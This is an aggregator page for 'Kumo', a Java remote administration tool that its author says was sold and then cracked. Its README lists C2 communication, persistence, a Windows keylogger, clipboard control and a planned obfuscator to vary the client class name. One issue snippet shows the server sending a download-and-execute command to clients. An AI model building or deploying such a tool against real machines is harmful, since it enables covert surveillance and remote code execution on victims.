Git Product home page Git Product logo

kumo's Introduction

Kumo

Kumo is a lightweight and portable remote administrative tool written in Java. It can be used on Windows, macOS, or Linux as long as they have the JRE installed.

I was selling this software for a while but it got cracked and I'm not maintaining it anymore, so here's the source :).

Features

  • AES encrypted C2 communication
  • Send commands to client
  • Cross platform (more or less)
  • Clean, simple, and modern UI
  • Easy client building process
  • Customizable server and client settings
  • Persistence
  • System information
  • Clipboard control
  • Visit website
  • Show messagebox
  • Windows keylogger
  • Plugin support

Compilation instructions

Windows:

.\gradlew.bat fatJar

This will produce a server jar in build/.

Linux: Same as above but ./gradlew fatJar. Produces the same output jar.

Legal

Kumo is not to be used without permission or ownership of the systems Kumo is installed on. Kumo is a remote administrative tool to aid in the control and management of systems alongside IT setups. Any other use is prohibited. Kumo is not liable for system damage or unauthorised use.

Notes

  • This is a very very very very hard fork of Ghosts/Maus, so props to Ghosts for a great starting point.
  • Originally this software was licensed, but it's been commented out (not fully removed) in kumo.Kumo.

TODO

  • Create basic obfuscator of final jar so the client class name isn't always Client.class
  • Organize the client context menu and add icons to those sections.

Contributing

Bug reports and pull requests are welcome on GitHub at https://github.com/cbrnrd/Kumo. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the Contributor Covenant code of conduct.

kumo's People

Contributors

cbrnrd avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

kumo's Issues

-panel>

Kumo/.idea/workspace.xml

Lines 768 to 773 in d64f35c

</todo-panel>
<todo-panel id="all">
<are-packages-shown value="true" />
<is-autoscroll-to-source value="true" />
</todo-panel>
</component>


This issue was generated by todo based on a todo comment in d64f35c. It's been assigned to @cbrnrd because they committed the code.

" order="6" weight="0.32998884" />

Kumo/.idea/workspace.xml

Lines 791 to 796 in d64f35c

<window_info anchor="bottom" id="TODO" order="6" weight="0.32998884" />
<window_info anchor="bottom" id="Event Log" order="7" sideWeight="0.5033557" side_tool="true" weight="0.28088236" />
<window_info anchor="bottom" id="Build" order="8" weight="0.33333334" />
<window_info anchor="bottom" id="Terminal" order="9" sideWeight="0.49731544" weight="0.6354515" />
<window_info anchor="bottom" id="Version Control" order="10" weight="0.32887402" />
<window_info anchor="bottom" id="Docker" order="11" show_stripe_button="false" />


This issue was generated by todo based on a TODO comment in d64f35c. It's been assigned to @cbrnrd because they committed the code.

-panel id="selected-file">

Kumo/.idea/workspace.xml

Lines 766 to 771 in d64f35c

<todo-panel id="selected-file">
<is-autoscroll-to-source value="true" />
</todo-panel>
<todo-panel id="all">
<are-packages-shown value="true" />
<is-autoscroll-to-source value="true" />


This issue was generated by todo based on a todo comment in d64f35c. It's been assigned to @cbrnrd because they committed the code.

put in url regex check

// TODO put in url regex check
String url = DownloadAndExecuteView.getUrlFieldValue();
Logger.log(Level.INFO, "Sending DaE for: " + url);
clientObject.clientCommunicate("DAE " + url);
//clientObject.clientCommunicate("CMD " + SendCommandView.getTextField().getText());
} catch (IOException e1) {


This issue was generated by todo based on a TODO comment in 2cecb93. It's been assigned to @cbrnrd because they committed the code.

-panel id="all">

Kumo/.idea/workspace.xml

Lines 769 to 774 in d64f35c

<todo-panel id="all">
<are-packages-shown value="true" />
<is-autoscroll-to-source value="true" />
</todo-panel>
</component>
<component name="ToolWindowManager">


This issue was generated by todo based on a todo comment in d64f35c. It's been assigned to @cbrnrd because they committed the code.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.